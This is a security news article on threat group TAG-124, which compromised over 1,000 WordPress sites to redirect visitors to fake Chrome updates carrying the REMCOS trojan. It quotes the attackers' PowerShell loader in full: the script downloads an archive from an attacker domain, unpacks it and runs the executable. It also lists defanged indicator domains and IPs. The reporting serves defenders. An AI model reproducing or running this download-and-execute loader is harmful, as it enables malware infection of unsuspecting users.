![From Gas Station to Google with Self-Taught Cloud Engineer Rishab Kumar [Podcast #158]](https://cdn.hashnode.com/res/hashnode/image/upload/v1738339892695/6b303b0a-c99c-4074-b4bd-104f98252c0c.png?#)
TAG-124 Hacked 1000+ WordPress Sites To Embed Payloads
A sophisticated cyber campaign orchestrated by the threat group TAG-124 has compromised over 1,000 WordPress websites to deploy malicious payloads. The operation leverages a multi-layered Traffic Distribution System (TDS) to infect users with malware, demonstrating advanced evasion tactics and infrastructure management. TAG-124’s infrastructure consists of compromised WordPress sites injected with malicious JavaScript to redirect visitors […] The post TAG-124 Hacked 1000+ WordPress Sites To Embed Payloads appeared first on Cyber Security News.
A sophisticated cyber campaign orchestrated by the threat group TAG-124 has compromised over 1,000 WordPress websites to deploy malicious payloads.
The operation leverages a multi-layered Traffic Distribution System (TDS) to infect users with malware, demonstrating advanced evasion tactics and infrastructure management.
TAG-124’s infrastructure consists of compromised WordPress sites injected with malicious JavaScript to redirect visitors to attacker-controlled payload servers.
.webp)
These servers host malware disguised as legitimate software updates, such as fake Google Chrome updates.
%20and%202%20(right)%20(Source%20-%20Recorded%20Future).webp)
A central management panel allows attackers to control and update URLs, logic, and infection tactics, enabling dynamic and adaptive attack strategies.
.webp)
Researchers at Insikt Group, Recorded Future’s threat research division noted that the attack begins when users visit compromised WordPress sites embedded with malicious scripts like the following:-
This script dynamically loads additional resources from attacker-controlled domains. TAG-124 frequently changes file names (e.g., metrics.js, hpms1989.js) and URLs to evade detection.
Payload Delivery
Visitors meeting specific conditions (geolocation or browser type) are redirected to fake landing pages mimicking legitimate software updates. For instance:-
Update ChromeThe downloaded file, Release.zip, contains malware such as the REMCOS Remote Access Trojan (RAT). A PowerShell script hosted on the same domain automates the malware installation:
$webClient = New-Object System.Net.WebClient
$url1 = "https://update-chronne[.]com/Release.zip"
$zipPath1 = "$env:TEMP\mgz.zip"
$webClient.DownloadFile($url1, $zipPath1)
Expand-Archive -Path $zipPath1 -DestinationPath "$env:TEMP\file"
Start-Process -FilePath "$env:TEMP\file\Set-upx.exe"TAG-124 employs advanced techniques such as:-
- ClickFix Technique: Displays dialogs prompting users to execute pre-copied commands.
- Dynamic URL Updates: Regularly changes URLs and filenames on compromised sites.
- Conditional Logic in TDS: Filters traffic based on visitor attributes to optimize infections.
The campaign has been linked to multiple ransomware groups, including Rhysida and Interlock, which utilize TAG-124’s infrastructure for their initial infection chains. The shared use of this TDS highlights collaboration among cybercriminal groups.
To protect against similar attacks, keep WordPress core, plugins, and themes updated to patch known vulnerabilities, and regularly scan for unauthorized JavaScript injections.
Implementing Web Application Firewalls (WAFs) helps block malicious traffic targeting vulnerable endpoints, while educating users about the risks of downloading software updates from unverified sources enhances overall security.
Indicators of Compromise (IoCs)
Key domains and IPs used in the attack include:-
- Domains:
vicrin[.]com,update-chronne[.]com - IPs:
146.70.41[.]191,45.61.136[.]67
Compromised WordPress sites include high-profile domains such as: www[.]ecowas[.]int and www[.]reloadinternet[.]com.
Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request
The post TAG-124 Hacked 1000+ WordPress Sites To Embed Payloads appeared first on Cyber Security News.
